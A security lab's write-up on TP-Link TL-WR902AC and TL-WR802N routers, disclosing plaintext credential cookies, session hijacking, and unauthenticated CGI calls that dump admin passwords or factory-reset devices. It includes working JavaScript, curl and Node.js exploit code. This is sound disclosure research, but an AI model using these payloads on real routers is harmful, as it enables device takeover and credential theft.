Examination of TP-Link devices

From Embedded Lab Vienna for IoT & Security

Summary

"With a market share of over 40 percent of the global consumer WLAN market, TP-Link is the No. 1 WLAN provider." [IDC Q4/2018] The TP-Link AC750 Wifi Travel Router (TL-WR902AC FW170828) transmittes Base64 encoded username:password as Authorisation cookie on every GET/POST request over non-encrypted HTTP. In addition, this is transmitted every 20 seconds in the form of a heartbeat message. But these credentials aren't even necessary, since tons of different CGI actions, ranging from Getter and Setter to System modifications, can be called from the login screen using JavaScript Injection (e.g. Factory reset: $.act(ACT_OP, ACT_OP_FACTORY_RESET); $.act(ACT_OP, ACT_OP_REBOOT); $.exe();; Get Login Credentials: $.act(ACT_GET, USER_CFG, null, null, ["adminName", "adminPwd"]); $.exe();) without the need of any authorization.

Introduction

TP-Link is a worldwide leading manufacturer of smart communication products which has made a name for itself in Europe, especially in the D-A-CH region, through efficient, reliable products and services. TP-Link Deutschland GmbH has existed since April 2009. Through their renowned distribution, online and retail partners, they sell an extensive range of award-winning SOHO products (WLAN, DSL, Powerline, repeaters, UMTS/LTE, print servers, IP cameras, smart home and smartphones) and SMB products (switches, routers, SFP modules, media converters, network adapters). With a market share of over 40 percent of the global consumer WLAN market, TP-Link is the No. 1 WLAN provider [IDC Q4/2018]. Their goal is to provide the ever-growing number of users with products of the highest quality and performance while maintaining competitive prices, and thus to remain No. 1 in the long term. In 2018, TP-Link sold 200 million devices worldwide, generating sales of around USD 2.2 billion. The company currently employs around 26,000 people worldwide (as of January 2019).

Source: [TP-Link Profile]

TL-WR902AC: AC750 Wifi - Travel Router

The incredibly compact TL-WR902AC is the world’s first AC750 travel router. It creates a personal Wi-Fi spot anywhere internet is available and transforms any internet connection into a private AC750 dual-band Wi-Fi network. The TL-WR902AC supports Router, Hotspot, Range Extender, Client and Access Point Modes.

Source: [Product]

TL-WR802N: 300Mbps Wireless N - Nano Router

The TL-WR802N is the smallest wireless router in the world. It is very easy to use and is a perfect choice for travelers, students, and anyone else who lives life on the go. The TL-WR802N can be powered using the included power adapter or a smartphone/USB charger. To meet the wireless needs of almost any situation you might encounter, the TL-WR802N supports Router, Hotspot, Range Extender, Client and Access Point modes.

Source: [Product]

Note: The analyzed device has hardware V4, but the Austrian support page only lists V1 and V2 (Link), whereas the German support page, like most other regional support pages, covers hardware V1 to V4 (Link).

Mode: Description
Router Mode: Create a private Wi-Fi network for Ethernet-based internet access.
Hotspot Mode: Connect to an outdoor WISP access point and enjoy a private Wi-Fi hotspot for your devices in public areas.
Range Extender Mode: Extend your existing Wi-Fi network to maximize coverage and eliminate dead zones.
Client Mode: Allow devices that require a wired connection to access an existing Wi-Fi network.
Access Point Mode: Create a wireless network for Wi-Fi enabled devices.

Examination

Summary

ⓘ Collected Information (columns: TL-WR902AC | TL-WR802N; rows with a single value were not recorded per device)
Device Model:      TL-WR902AC | TL-WR802N
Manufacturer:      TP-Link | TP-Link
Product Type:      AC750 Wifi Travel Router | 300 Mbps Wireless Nano Router
Description:       Transforms any internet connection into a private AC750 dual-band Wi-Fi network | The smallest wireless N router in the world
Price on Release:  38€ | 28€
Release:           2017 Q1 (ongoing as of July 2020) | 2015 Q2 (ongoing as of July 2020)
State of Research: Multiple vulnerabilities | Some vulnerabilities, ongoing examination
Ports:             USB 2.0, 10/100 Mbps WAN/LAN port | 10/100 Mbps WAN/LAN port
Buttons:           Reset, WPS | Reset
LED:               Power/Status, WAN, WLAN, USB | Power/Status
Power:             5V/2A DC | 5V/1A DC
WLAN:              2.4 GHz: 802.11b/g/n (up to 300 Mbps), 5 GHz: 802.11ac/n/a (up to 433 Mbps) | 2.4 GHz: 802.11b/g/n (up to 300 Mbps)
Other:             3-mode switch | N/A
FCC-ID:            TE7WR902ACV3 | TE7WR802NV4
System:            Ralink APSoC
Processor:         MT7628 MIPS24KEc V5.5 (580 MHz)
BogoMIPS:          386.04
Memory:            DRAM: 64 MB (16-bit)
Storage:           Boot from SPI flash GD25Q64B
Ethernet MAC:      98:DA:C4:6E:00:FC
WLAN MAC:          2.4 GHz: 98:da:c4:6e:00:fc, 5 GHz: 98:da:c4:6e:00:fd
WLAN SSID:         2.4 GHz: TP-Link_00FC; 5 GHz: TP-Link_00FC_5G; guest: TP-Link_Guest_00FC | 2.4 GHz: TP-Link_C3AE
WLAN PSK:          37490720
Default IPv4:      WLAN: 192.168.1.1
Hostname:          TL-WR902AC | TL-WR802N
NET Protocols:     SSH, FTP, HTTP, SMB, UPnP | SSH, HTTP, UPnP
Interfaces:        ttyS1: console; eth0, eth0.2, eth0.3, eth0.4, eth0.5, eth0.6, br0: Ethernet/bridge; ra0, rai0: WLAN
Ports:             21/tcp ftp, 22/tcp ssh, 80/tcp http, 139/tcp smbd, 445/tcp smbd, 1900/tcp upnp, 1900/udp wscd (SSDP), 20002/udp httpd?, 40955/tcp upnp | 22/tcp ssh, 53/tcp dnsmasq, 80/tcp http, 1900/tcp upnp, 1900/udp wscd (SSDP), 20002/udp httpd?
Webpage:           http://tplink.net
Webaccess:         admin:admin (default) | admin:admin (default)
Root Password:     N/A | N/A
Other Login Pw:    admin:admin (default) | admin:admin (default)
Firmware:          0.9.1 0.1 v0089.0 Build 170828 Rel.57433n(4555) | 0.9.1 3.17 v0001.0 Build 190428 Rel.63523n
Hardware:          TL-WR902AC(EU) V3 | TL-WR802N(EU) V4
Baudrate:          115200 (8N1); 7N1 is needed for the U-Boot output and also works for Linux, but no input is accepted
Bootdelay:         N/A
Bootloader:        U-Boot 1.1.3 || Ralink UBoot Version: 4.3.0.0
mtdparts:          dev:  size     erasesize name
                   mtd0: 00020000 00010000 "boot"
                   mtd1: 00140000 00010000 "kernel"
                   mtd2: 00660000 00010000 "rootfs"
                   mtd3: 00010000 00010000 "config"
                   mtd4: 00010000 00010000 "romfile"
                   mtd5: 00010000 00010000 "rom"
                   mtd6: 00010000 00010000 "radio"
Filesystem:        squashfs, fuse
Image:             TD-W8968
Linux:             2.6.36 | 2.6.36
Kernel cmdline:    console=ttyS1,115200 root=/dev/mtdblock2 rootfstype=squashfs init=/sbin/init
Shell:             sh, ash | sh, ash
BusyBox:           v1.19.2 (2017) multi-call binary
Services:          vsftpd; sshd; http; smbd; uPnP; VLAN; IPv6

Wireless Security

To proceed with the next chapters, access to the router's LAN is required. Since it is not mandatory to change the Pre-Shared Key (PSK) or the Service Set Identifier (SSID, TP-Link_XXXX) during setup, I assume that most ordinary users leave both at their defaults, which leaves the device protected only by an 8-digit ([0-9]{8}) PSK. The default PSK can easily be recovered: a deauthentication attack forces a client to reconnect so that the WPA2 4-way handshake can be captured, and the handshake is then brute-forced offline. On an Intel i9-9980HK CPU with Aircrack-ng 1.6 on macOS 10.15, exhausting the whole 10^8 keyspace takes at most 78 minutes at 21177 keys/s. A more powerful setup with modern GPUs and hashcat (an eight-digit mask, ?d?d?d?d?d?d?d?d) would cut that time drastically. This makes the default PSK an attractive attack vector, even for a mobile device that does not stay in one physical location for long.

Network Mapper

TL-WR902AC: AC750 Wifi - Travel Router

Local Area Network

PORT     STATE SERVICE     VERSION

21/tcp   open  ftp         vsftpd 2.0.8 or later
|_ftp-anon: got code 500 "OOPS: no entry found!".

22/tcp   open  ssh         Dropbear sshd 2012.55 (protocol 2.0)
| ssh-hostkey: 
|   1024 ff:29:95:59:3a:2e:18:cd:13:7b:4f:c9:df:0f:a9:4f (DSA)
|_  1040 54:af:2a:2a:03:ae:a1:f2:c6:1c:a1:2f:85:a6:fe:1b (RSA)

80/tcp   open  http        TP-LINK TD-W8968 http admin
|_http-title: Site doesn't have a title (text/html; charset=utf-8).

139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.14a (workgroup: WORKGROUP)
1900/tcp open  upnp        Portable SDK for UPnP devices 1.6.19 (Linux 2.6.36; UPnP 1.0)
1900/udp open  wscd: SSDP  Portable SDK for UPnP devices 1.6.19 (Linux 2.6.36; UPnP 1.0)
20002/udp open  httpd?     UDP hello messages.
40955/tcp open  upnp       Portable SDK for UPnP devices 1.6.19 (Linux 2.6.36; UPnP 1.0)

Service Info: Host: TP-Link; OS: Linux; Device: WAP; CPE: cpe:/o:linux:linux_kernel, cpe:/h:tp-link:td-w8968, cpe:/o:linux:linux_kernel:2.6.36

Host script results:
|_clock-skew: mean: -18432d18h23m26s, deviation: 0s, median: -18432d18h23m26s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.14a)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 1970-01-01T00:03:48+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: share (dangerous)
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Wide Area Network (WAN)

Host is up.

TL-WR802N: 300Mbps Wireless N - Nano Router

Local Area Network

PORT     STATE  SERVICE VERSION

22/tcp   open   ssh     Dropbear sshd 2012.55 (protocol 2.0)
| ssh-hostkey:
|   1024 c5:2f:17:05:d0:da:57:ea:16:d8:4c:c3:14:a6:b3:c9 (DSA)
|_  1039 6c:06:ba:de:54:2d:05:02:f9:79:a6:79:2e:64:9f:96 (RSA)

53/tcp   open  domain  dnsmasq 2.78
| dns-nsid:
|   NSID: viezcnsat10 (7669657a636e7361743130)
|   id.server: viezcnsat10
|_  bind.version: dnsmasq-2.78

80/tcp   open   http
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 16113
|     Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
|     Connection: keep-alive
|   HTTPOptions, RTSPRequest:
|     HTTP/1.1 405 Method Not Allowed
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 124
|     Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
|_    Connection: close
|_http-title: Site doesn't have a title (text/html; charset=utf-8).

1900/tcp open   upnp    Portable SDK for UPnP devices 1.6.19 (Linux 2.6.36; UPnP 1.0)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:2.6.36

Wide Area Network (WAN)

Host is up.

Spoiler: The username and password are shared between the HTTP, FTP, SSH and SMB services. They are set via the web interface and stored in the passwd file. The default credentials are admin:admin.

Secure shell (SSH)

TL-WR902AC: AC750 Wifi - Travel Router
TL-WR802N$ ssh admin@192.168.0.1
admin@192.168.0.1's password: admin
PTY allocation request failed on channel 0
shell request failed on channel 0

TL-WR802N$ scp admin@192.168.0.1:/etc/passwd ./tmp/
admin@192.168.0.1's password: admin
exec request failed on channel 0
Note: "PTY allocation request failed" indicates that the login was successful but the device provides no interactive shell. This can be verified using the -vvv debugging mode of ssh.

To help customers manage and configure the TP-Link device better, some TP-Link apps are published for mobile devices, such as the Tether 2.0 app, Deco app, Tapo app, and tpCamera app, etc. The TP-Link app adopts the SSH service, so the products that can use the app also support SSH correspondingly. And TCP port 22, as the default port of the SSH service, is set to be open. However, SSH services on the TP-Link products are only available for TP-Link apps. Other SSH clients cannot access TP-Link products or adjust their settings with command lines. So please rest assured that the SSH will never cause any safety issues on your device.

Source: [Support]

Note: While the dropbear package provides SCP functionality, it does not contain anything for SFTP.

File Transfer Protocol (FTP)

TL-WR902AC: AC750 Wifi - Travel Router
TL-WR802N$ ftp 192.168.1.1 21
Connected to 192.168.1.1.
220 Welcome to TP-Link FTP server
Name (192.168.1.1): admin
331 Please specify the password.
Password: admin
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> pwd
257 "/"

ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.

ftp>
Note: The FTP server maps USB volumes, which can be configured on the web page; without a configured volume the FTP root is empty, which is what the admin:admin login above ends up in.

Server Message Block (SMB)

Note: Ongoing Investigation
TL-WR802N$ smbclient -L 192.168.1.1 -U admin
Unable to initialize messaging context
Enter WORKGROUP\admin's password:
Server requested LANMAN password (share-level security) but 'client lanman auth = no' or 'client ntlmv2 auth = yes'
tree connect failed: NT_STATUS_ACCESS_DENIED

Universal Plug and Play (UPnP)

Note: Ongoing Investigation

TP-Link Device Debug Protocol (TDDP)

Note: Ongoing Investigation
The TP-Link Device Debug Protocol (TDDP) is in use across most of the TP-Link product line, including routers and access points.

A firmware downgrade would be the only interesting attack in this context, since it would bring back all the vulnerabilities of the first firmware version (FWv1) described below on a device that has been updated.

Note: Requires in-depth investigation!

Web Interface

The device can be managed through a web interface or via the mobile app. The web interface is served over plain HTTP and requires authorization. The device offers an initial setup process in which a user could change the credentials and WLAN passwords from their defaults, but it does not enforce any change. TP-Link uses a custom HTTP daemon with a CGI interface.
Note: The web page provides no encrypted (HTTPS) connection.
Note: No responsive design, almost unusable on a phone; mobile users "should" use the mobile app.

Authentication Bypass

Warning: The user name and password can be changed.
Both must not exceed 15 characters in length and must not include any spaces (32 characters on the newer firmware).

Using Cookies

The login process on the TL-WR902AC with FW version 170828 is quite primitive. Clicking the login button calls the function PCSubWin(). This function does not talk to the server at all; it creates an Authorization cookie from the contents of the username and password fields. The cookie mimics HTTP Basic authentication: username:password is Base64-encoded and stored as a cookie (example: Authorization=Basic YWRtaW46YWRtaW4=). Afterwards the page is reloaded. If the server accepts the cookie, you land in the user interface; otherwise the faulty cookie is removed and the login page is reloaded.
// Reduced PCSubWin() logic from the FW170828 login page: no request is made,
// the cookie is built client-side and the page is simply reloaded.
var auth;
var password = "admin"; //$.id("pcPassword").value;
var userName = "admin"; //$.id("userName").value;

auth = "Basic "+Base64Encoding(userName+":"+password); // Base64Encoding() is provided by the router's lib.js
document.cookie = "Authorization=" + auth;              // e.g. Authorization=Basic YWRtaW46YWRtaW4=
window.location.reload();
Note: Login limited to 10 attempts
Note: The router allows only one administrator to login at the same time
Figure: TL-WR902AC, Wireshark capture of the Authorization cookie
This Authorization cookie is sent on every interaction with the server. Since the site offers no HTTPS, anyone on the LAN who can sniff or MitM the traffic can intercept it and simply Base64-decode it. Because the login is shared, this also yields access to the FTP, SSH and HTTP services. It does require a user who is currently active in the web interface; however, some pages such as the index page reload their content (/main/status.html?_=$TIMESTAMP) every 20 seconds and thus retransmit the cookie, so an attacker only has to wait.
$ echo YWRtaW46YWRtaW4= | base64 --decode
admin:admin
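What a sniffer on the LAN has to do with one captured request, as an added example that is not from the original page: the request text below is constructed for this example (only the cookie value YWRtaW46YWRtaW4= matches the capture shown on the page), and the parsing is deliberately tolerant of the space in the cookie value being sent raw or percent-encoded, since document.cookie stores it unencoded. Function names are this example's own.

```javascript
// Added example (not from the original page): decode the FW170828 Authorization
// cookie from a captured HTTP request. The request below is constructed for
// this example; only the cookie value matches the capture shown on the page.
const CAPTURED_REQUEST = [
  "GET /main/status.html?_=1594640000000 HTTP/1.1",
  "Host: 192.168.1.1",
  "Referer: http://192.168.1.1/",
  "Cookie: Authorization=Basic YWRtaW46YWRtaW4=",
  "Connection: keep-alive",
  "",
  "",
].join("\r\n");

// Split a Cookie header into name -> value. Values are kept verbatim; a value
// containing '=' (Base64 padding!) must not be cut at the second '='.
function parseCookieHeader(headerValue) {
  const cookies = {};
  for (const part of headerValue.split(";")) {
    const eq = part.indexOf("=");
    if (eq < 0) continue;
    cookies[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  return cookies;
}

// Decode "Basic <base64>" into {username, password}; the password may itself
// contain ':', so only the first colon separates the two.
function decodeBasic(value) {
  let v = value;
  try { v = decodeURIComponent(value); } catch (e) { /* keep the raw value */ }
  const m = /^Basic\s+([A-Za-z0-9+/]+=*)$/.exec(v);
  if (!m) return null;
  const decoded = Buffer.from(m[1], "base64").toString("utf8");
  const colon = decoded.indexOf(":");
  if (colon < 0) return null;
  return { username: decoded.slice(0, colon), password: decoded.slice(colon + 1) };
}

// Walk the headers of one captured request and return the credentials carried
// by the Authorization cookie, or null if the request carries none.
function credentialsFromRequest(rawRequest) {
  const lines = rawRequest.split(/\r?\n/);
  for (const line of lines.slice(1)) {      // skip the request line
    if (line === "") break;                 // blank line ends the headers
    const m = /^Cookie:\s*(.*)$/i.exec(line);
    if (!m) continue;
    const auth = parseCookieHeader(m[1]).Authorization;
    if (auth) {
      const creds = decodeBasic(auth);
      if (creds) return creds;
    }
  }
  return null;
}
```

Fed with a pcap export of the HTTP stream, this is the entire attack; there is no secret to recover beyond the Base64 decoding, which is why the shared login makes the cookie worth as much as the SSH or FTP password.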

Using Session hijacking

The TL-WR802N with the newer FW version 190428 no longer uses the Authorization cookie. It uses a JSESSIONID cookie and AES-encrypted payloads instead. It still supports HTTP only, so hijacking an ongoing session by replaying the cookie remains easy, but the credentials themselves no longer leak. Notably, the server sends all parameters needed to generate the AES key (the RSA modulus nn, the exponent ee and a sequence number seq) in response to an unauthenticated CGI call ($.act(ACT_CGI, "/cgi/getParm"); $.exe(null,false,0);), which can be issued at any time. nn changes on reboot and seq on every request.
Note: The results of CGI calls are parsed automatically and are accessible from JavaScript after $.exe() has run, e.g. via $.ret.
TL-WR802N: Login process
// 1. Fetch the key parameters; this call needs no authentication.
$.act(ACT_CGI, "/cgi/getParm");
$.exe(null,false,0);

	// Request Parameters
	// [/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0

	// Example Response
	// lib.js:396 XHR finished loading: POST "http://192.168.1.1/cgi?8"
	// [cgi]0
	// var ee="010001";
	// var nn="BF52337CDDC3F46ADE7663765F170AB464AE93BF981B02B95FCE1E94" +
	//        "62DD9A03ED3E09CCEFDFD7FACE81EE38136FC081735686FE630BBADB" +
	//        "DAB24BE0443A2B25";
	// var seq="812508797";
	// $.ret=0;
	// [error]0

// 2. The returned script defined ee, nn and seq as globals; hand them to the encryptor.
$.nn = nn;
$.ee = ee;
$.seq = seq;

var userName = "admin"; //$.id("userName").value;
var password = "admin"; //$.id("pcPassword").value;

$.Iencryptor.setSeq($.seq);
$.Iencryptor.setRSAKey($.nn, $.ee);
$.Iencryptor.setHash(userName, password);
$.Iencryptor.genAESKey();

// 3. Send the actual login; the payload is encrypted with the key generated above.
var credentials = {};
credentials.username = userName;
credentials.password = password;

$.act(ACT_CGI, "/cgi/login", null, null, credentials);

$.newencryptorManager.recordEncryptor();

if(!$.exe(null, false, 1)) {
	window.location.reload();
}

Using unauthenticated CGI calls

As if that wasn't enough, it is even possible to retrieve the Admin Credentials in plain text. This is possible without authentication and can be done at any time. All that is needed is a call to the corresponding Common Gateway Interface (CGI) object via JavaScript injection.
Get All User Information
$.act(ACT_GET, USER_CFG); $.act(ACT_GET, CURRENT_USER); $.exe();

	[0,0,0,0,0,0]0
	rootName=
	rootPwd=
	adminName=admin
	adminPwd=admin
	userName=
	userPwd=

	[0,0,0,0,0,0]1
	userName=
	passwd=
	httpSession=
	userSetting=0
	action=0
	loginStatus=0
	userRole=3
	logInCloud=0
	needReconn=0
	[error]0
Get admin username and password
$.act(ACT_GET, USER_CFG, null, null, ["adminName", "adminPwd"]); $.exe();
// Equivalent request using cURL (no browser needed):
// curl -X POST "http://192.168.1.1/cgi?1" -H "Referer: http://192.168.1.1" -d $'[USER_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2\r\nadminName\r\nadminPwd\r\n'

	[0,0,0,0,0,0]0
	adminName=admin
	adminPwd=admin
	[error]0

Common Gateway Interface

The devices examined here expose a CGI interface over HTTP on port 80, which is evaluated by TP-Link's custom HTTP daemon; the mobile app uses SSH on port 22 instead. When working with the CGI it is most convenient to use the predefined functions $.act() and $.exe() from the browser console. They are part of lib.js, convert the request into the format the server accepts, and submit it via AJAX using the $.io() function. This is much easier than imitating the format by hand. $.act(type, oid, stack, pStack, attrs) has two mandatory parameters: the request type and an object identifier (oid). Several requests can be pushed onto the stack with $.act() and then sent together in one request with $.exe(). Each type is appended to the URL as a numeric GET parameter (/cgi?1&2&3). Each oid goes into the payload as a header line of the form [oid#stack#pStack]index,count, where stack and pStack default to 0,0,0,0,0,0, index is the position of the request within the batch and count is the number of attribute lines that follow. If attributes (attrs) are passed, they are appended line by line after that header (a name for getters, name=value for setters). The remaining fields are not explained in detail here. A list of available types and OIDs and a shortened form of lib.js are listed below under Client-side CGI Insights. Countless examples of these functions can be found when analyzing the website; lib.js and oid_str.js are of particular interest.
// Example Format: three requests batched in one $.exe()
URL: http://192.168.1.1/cgi?5&1&1
Payload:
   [oid#0,0,0,0,0,0#0,0,0,0,0,0]0,0
   [oid#0,0,0,0,0,0#0,0,0,0,0,0]1,count(attr)
   attr[1]
   attr[2]
   attr[3]
   [USER_CFG#0,0,0,0,0,0#0,0,0,0,0,0]2,2
   adminName
   adminPwd
Warning: Unless you use a modified $.io() function that logs results to the console or similar, the responses must be read from the browser's network tab or from Wireshark, depending on the setup.
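As an added example (not the router's lib.js and not from the original page), the following Node.js code re-implements the wire format that $.act()/$.exe() produce and that the resolve() callback parses, so that both the unauthenticated USER_CFG read above and the getParm response from the session-hijacking section can be built and parsed offline, without evaluating the JavaScript the router returns. Function names are this example's own; the type numbers, OIDs and sample responses are taken from the page. Sending the request (with fetch or the cURL line above) is left out so the code runs without the device.

```javascript
// Added example (not the router's lib.js and not from the original page):
// build and parse the TP-Link CGI wire format used by $.act()/$.exe().
const ACT_GET = 1, ACT_SET = 2, ACT_OP = 7, ACT_CGI = 8;
const DEFAULT_STACK = "0,0,0,0,0,0";

// Mirror of $.act(type, oid, stack, pStack, attrs): queue one action.
// attrs is an array of names (getters) or an object of name/value pairs (setters/login).
function act(type, oid, stack, pStack, attrs) {
  let lines = [];
  if (Array.isArray(attrs)) lines = attrs.slice();
  else if (attrs) lines = Object.entries(attrs).map(([k, v]) => `${k}=${v}`);
  return { type, oid, stack: stack || DEFAULT_STACK, pStack: pStack || DEFAULT_STACK, lines };
}

// Mirror of $.exe(): every type becomes a numeric GET parameter, every action a
// "[oid#stack#pStack]index,count" header followed by count attribute lines.
function buildCgiRequest(actions, base = "http://192.168.1.1") {
  const url = `${base}/cgi?${actions.map((a) => a.type).join("&")}`;
  let body = "";
  actions.forEach((a, index) => {
    body += `[${a.oid}#${a.stack}#${a.pStack}]${index},${a.lines.length}\r\n`;
    for (const line of a.lines) body += `${line}\r\n`;
  });
  return { url, body };
}

// Mirror of resolve(): "[stack]index" opens the record for action `index`,
// "[error]code" carries the overall result code, and a "[cgi]" record holds
// JavaScript that lib.js would eval (the getParm response). Everything else is
// a name=value attribute of the current record.
function parseCgiResponse(text) {
  const result = { error: 0, records: [], cgiScript: "" };
  let current = null;
  for (const raw of text.split("\n")) {
    const line = raw.replace(/\r$/, "");
    if (line.trim() === "") continue;
    if (line.charAt(0) === "[") {
      const close = line.indexOf("]");
      const stack = line.substring(1, close);
      const index = parseInt(line.substring(close + 1), 10);
      if (stack === "error") { result.error = index; current = null; continue; }
      current = { index, stack, attrs: {} };
      result.records.push(current);
    } else if (current && current.stack === "cgi") {
      result.cgiScript += line + "\n";
    } else if (current) {
      const eq = line.indexOf("=");
      if (eq < 0) current.attrs[line] = "";
      else current.attrs[line.slice(0, eq)] = line.slice(eq + 1);
    }
  }
  return result;
}

// Read ee, nn and seq out of the getParm script without eval'ing router-
// supplied JavaScript; string pieces joined with '+' are concatenated.
function extractGetParm(cgiScript) {
  const grab = (name) => {
    const m = new RegExp(`var ${name}\\s*=\\s*([\\s\\S]*?);`).exec(cgiScript);
    return m ? m[1].replace(/["'+\s]/g, "") : null;
  };
  return { ee: grab("ee"), nn: grab("nn"), seq: grab("seq") };
}
```

buildCgiRequest([act(ACT_GET, "USER_CFG", null, null, ["adminName", "adminPwd"])]) yields exactly the URL and body of the cURL line above, and parseCgiResponse() applied to the server's reply returns the admin credentials as records[0].attrs. The parser deliberately never evaluates the [cgi] script: lib.js runs it through $.script(), which means any host able to answer on the LAN can execute JavaScript in the admin's browser.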

Client-side CGI Insights

TL-WR902AC FW170828
ⓘ Strongly Reduced version of the lib.js, showing the $.cgi, $.act and $.exe methods.
// lib_modified.js
(function(){
	var window = this;

	window.$ = {

		cgi: function(path, arg, hook, noquit, unerr) {
			var expr = /(^|\/)(\w+)\.htm$/;
			if ($.local || $.sim) path = $.params;
			else path = (path ? path : $.curPage.replace(/\.htm$/, ".cgi")) + (arg ? "?" + $.toStr(arg, "=", "&") : "");
			$.ret = 0;
			var func = hook ? function(ret) {if (!ret && (ret = $.ret)) $.err("cgi", $.ret, unerr); if (typeof hook === "function") hook(ret);} : null;
			var ret =  $.io(path, true, func, null, noquit, unerr);
			
			if (!ret && (ret = $.ret))
				$.err("cgi", $.ret, unerr);
			return ret;
		},

		act: function(type, oid, stack, pStack, attrs) {

			stack = stack ? stack : "0,0,0,0,0,0";
			pStack = pStack ? pStack : "0,0,0,0,0,0";
			attrs = $.toStr(attrs, "=", "\r\n", true);
			attrs = attrs.replace(/__stack=[0-9,]*\r\n/, "");

			var ret = null;

			switch (type) {
				case ACT_ADD:		
					if ($.cn) attrs = $.ansi(attrs);
				case ACT_GET:		
					ret = {};
					break;
				case ACT_GL:		
				case ACT_GS:		
					ret = [];
					break;
				case ACT_SET:		
				case ACT_CGI:
					oid = oid ? oid : $.curPage.replace(/\.htm$/, ".cgi");
					if ($.cn) attrs = $.ansi(attrs);
				case ACT_DEL:		
				case ACT_OP:
					break;
				default: 
					return false;
			}

			$.as.push([type, null, oid, stack, pStack, attrs, attrs ? attrs.match(/\r\n/g).length : 0]);
			$.ds.push(ret);
			
			return ret;
		},
		
		exe: function(hook, unerr) {

			var url = "/cgi?";
			var data = "";
			var index = 0;
			var count = 0;   // retry counter for ERR_HTTP_ERR_CGI_INVALID_ANSI (declaration lost in the reduced version)
			var ret;
			var obj;
			var bAnsi = false;
			
			if ($.as.length == 0 || $.local || $.sim) {
				if (hook && typeof hook === "function") $.timeout(hook, 200);
				while($.as.pop() !== undefined);
				while($.ds.pop() !== undefined);
				return 0;
			}
			
			$.empty($.id("ansiform"));
			while ($.ansiarg.length) {
				obj = $.ansiarg.shift();
				$.append($.id("ansiform"), "<input type='hidden' name='"+obj[0]+"' value='"+obj[1].replace(/\&/g, "&amp;").replace(/</g, "&lt;").replace(/'/g, "&apos;")+"' />");
				bAnsi = true;
			}
			
			while(obj = $.as.shift()){
				url += obj[0] + (obj[1] ? "=" + obj[1] : "") + "&";
				data += "[" + obj[2] + "#" + obj[3] + "#" + obj[4] + "]" + index + ", " + obj[6] + "\r\n" + obj[5];
				index++;
			}			
			url = url.substr(0, url.length - 1);
			
			if (hook) {
				var tmpds = $.mkArr($.ds);
				while($.ds.length) $.ds.pop();	
			}
			
			var resolve = function(ret, ds) {
				if (typeof ret !== "number") {
					var lines = ret.split('\n');
					ret = 0;
					$.ret = 0;
					var scripts = "";
					
					for (var i = 0, l = lines.length; i < l; i++) {
						if (lines[i] == "") continue;
						if (lines[i].charAt(0) == "[") {
							if (scripts != "") {
								$.script(scripts);
								if ($.ret) {
									ret = $.ret;
									$.err("cgi", ret, unerr);
									break;
								}
								scripts = "";
							}
							var n = lines[i].indexOf("]");
							var j = parseInt(lines[i].substr(n+1), 10);
							var stack = lines[i].substr(1, n-1);
							var instance;
							if (stack == "error") {
								if (j) {
									ret = j;
									if (ret != ERR_HTTP_ERR_CGI_INVALID_ANSI) $.err("exe", ret, unerr);
									break;
								}
							}
							else if (ds[j] instanceof Array) {
								instance = {__stack: stack};
								ds[j].push(instance);
							}
							else if (ds[j] != null) {
								instance  = ds[j];
								instance.__stack = stack;
							}
						}
						else {
							if (stack == "cgi") {
								scripts += lines[i] + '\n';
							}
							else {
								var attr = lines[i].split("=");
								instance[attr[0]] = attr.slice(1).join('=');
							}
						}
					}
				}
				while(ds.length) ds.pop();
				return ret;
			}
			
			if (bAnsi) {
				var formObj = $.d.forms[0];	
				try {
					formObj.target = "up_frame";
					formObj.action = "/cgi/ansi";
					formObj.submit();
				}catch(e){}
			}
			
			if (hook) {
				var resolve2 = function(){
					$.io(url, false, function(ret){ 
						ret = resolve(ret, tmpds); 
						if (typeof hook === "function") hook(ret);
					}, data, false, unerr)
				};
				if (bAnsi) $.timeout(resolve2, 100);
				else resolve2();
				return 0;
			}
			else {
				while(ret = $.io(url, false, null, data, false, unerr)) {
					ret = resolve(ret, $.ds);
					if (ret != ERR_HTTP_ERR_CGI_INVALID_ANSI) return ret;
					count++;
					if (count > 3) return $.err("exe", ERR_HTTP_ERR_CGI_INVALID_ANSI, unerr);
				}
			}
		}
	};
})();
ⓘ CGI parameters extracted from lib.js and oid_str.js
// Type
var ACT_GET = 1;	//----
var ACT_SET = 2;	//----
var ACT_ADD = 3;
var ACT_DEL = 4;
var ACT_GL  = 5;
var ACT_GS  = 6;
var ACT_OP  = 7;	//----
var ACT_CGI = 8;	//----

// Operations
var ACT_OP_REBOOT 				= "ACT_REBOOT";				//----
var ACT_OP_FACTORY_RESET 		= "ACT_FACTORY_RESET";		//----
var ACT_OP_DHCP_RENEW 			= "ACT_DHCP_RENEW";
var ACT_OP_DHCP_RELEASE 		= "ACT_DHCP_RELEASE";
var ACT_OP_PPP_CONN 			= "ACT_PPP_CONN";
var ACT_OP_PPP_DISCONN 			= "ACT_PPP_DISCONN";
var ACT_OP_WLAN_GET_NEW_PIN 	= "ACT_WLAN_GET_NEW_PIN";
var ACT_OP_WLAN_RESTORE_PIN 	= "ACT_WLAN_RESTORE_PIN";
var ACT_OP_WLAN_UPDATE_ASSOC 	= "ACT_WLAN_UPDATE_ASSOC";
var ACT_OP_WLAN_WPS_PBC 		= "ACT_WLAN_WPS_PBC";
var ACT_OP_WLAN_WPS_PIN 		= "ACT_WLAN_WPS_PIN";
var ACT_OP_WLAN_SCAN 			= "ACT_WLAN_SCAN";
